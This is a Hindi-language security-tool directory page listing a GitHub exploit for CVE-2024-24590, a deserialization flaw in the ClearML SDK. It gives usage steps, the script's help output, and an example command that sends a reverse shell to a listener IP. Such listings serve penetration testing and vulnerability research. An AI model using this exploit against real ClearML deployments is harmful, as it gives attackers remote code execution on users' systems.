Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-24590 — अविश्वसनीय डेटा का डीसीरियलाइज़ेशन Allegro AI के ClearML प्लेटफॉर्म के क्लाइंट SDK के संस्करण 0.17.0 से 1.14.2 में हो सकता है, जो एक दुर्भावनापूर्ण रूप से अपलोड किए गए आर्टिफैक्ट को अंतिम उपयोगकर्ता के सिस्टम पर इंटरैक्ट करने पर मनमाना कोड चलाने में सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/junnythemarksman/cve-2024-24590
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगआपूर्ति श्रृंखला सुरक्षारिमोट एक्सेस टूल
GitHubjunnythemarksman/cve-2024-24590

CVE-2024-24590

अविश्वसनीय डेटा का डीसीरियलाइज़ेशन Allegro AI के ClearML प्लेटफॉर्म के क्लाइंट SDK के संस्करण 0.17.0 से 1.14.2 में हो सकता है, जो एक दुर्भावनापूर्ण रूप से अपलोड किए गए आर्टिफैक्ट को अंतिम उपयोगकर्ता के सिस्टम पर इंटरैक्ट करने पर मनमाना कोड चलाने में सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-24590

अविश्वसनीय डेटा का डिसीरियलाइज़ेशन एलिग्रो एआई के ClearML प्लेटफ़ॉर्म के क्लाइंट SDK के संस्करण 0.17.0 से 1.14.2 में हो सकता है, जिससे दुर्भावनापूर्ण रूप से अपलोड किया गया आर्टिफैक्ट किसी अंतिम उपयोगकर्ता के सिस्टम पर इंटरैक्ट करने पर मनमाना कोड चला सकता है।

उपयोग

  1. दिए गए क्रेडेंशियल चिपकाएँ और clearml-init चलाएँ
  2. एक टर्मिनल में exploit.py पायथन स्क्रिप्ट चलाएँ और दूसरे टर्मिनल में एक लिसनर रखें
  3. रिवर्स शेल प्राप्त करने के लिए एक्सप्लॉइट को कई बार चलाने की आवश्यकता हो सकती है
root@kitploit:~
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'

एक्सप्लॉइट विवरण

  1. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
  2. https://www.cvedetails.com/cve/CVE-2024-24590/
टूल डाउनलोड करें